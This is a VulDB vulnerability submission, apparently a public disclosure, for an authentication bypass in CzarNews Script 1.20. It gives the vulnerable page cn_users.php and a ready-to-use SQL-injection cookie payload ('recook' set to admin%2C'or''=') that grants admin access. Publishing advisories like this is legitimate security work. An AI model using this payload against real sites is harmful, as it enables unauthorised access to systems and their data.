| 제목 | CzarNews Script – Authentication Bypass |
|---|
| 설명 | Introduction
Exploit Title: CzarNews Script – Authentication Bypass
Version: 1.20
Date: 28.01.2017
Vendor Homepage: http://www.czaries.net
Software Download: http://www.czaries.net/scripts/czarnews.php
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
CzarNwes is a news script that provides powerful news manager on your website. It uses the fastest MySql database system that allows quick changes with posting and comment. Users are allowed unlimitedly under some conditoins to access your own database. News can be posted easily and quickly and it supports HTML and other formatting styles. A highly effective admin panel allows you to do everything on your website. Password retrieval system helps you when the password is forgotten. Installation takes less than a minute and it requires php 4.x and MySql database.
Vulnerable Url:
http://locahost/czarnews/cn_users.php
Set new cookie:
Name : recook
Value : admin%2C'or''='
and refresh the page. |
|---|
| 사용자 | KAAN KAMIS (UID 213) |
|---|
| 제출 | 2017. 01. 29. PM 03:50 (9 연령 ago) |
|---|
| 모더레이션 | 2017. 01. 30. PM 03:49 (24 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 96259 [CzarNews Script 1.20 Cookie /czarnews/cn_users.php recook SQL 주입] |
|---|
| 포인트들 | 17 |
|---|